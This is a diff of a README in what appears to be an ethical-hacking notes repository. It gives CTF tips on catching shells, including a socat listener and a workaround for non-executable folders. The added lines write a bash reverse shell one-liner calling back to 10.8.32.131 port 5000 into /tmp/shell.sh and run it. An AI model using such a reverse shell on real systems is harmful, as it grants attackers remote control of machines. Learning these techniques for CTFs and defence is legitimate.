alessandro-ancona/Ethical-Hacking-Reporitory/README.md

       $ socat TCP-L:[port] FILE:`tty`,raw,echo=0

 - **Metasploit**: sometimes banned from CTF environments

+In case not working, this is because you are in a non executable folder.
+Try to change folder to `/tmp` and create a bash script:

+      echo "bash -c 'bash -i >& /dev/tcp/10.8.32.131/5000 0>&1'" > /tmp/shell.sh

+      Then:

+      bash /tmp/shell.sh

 All reverse shells are available at [Reverse Shell Cheat Sheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)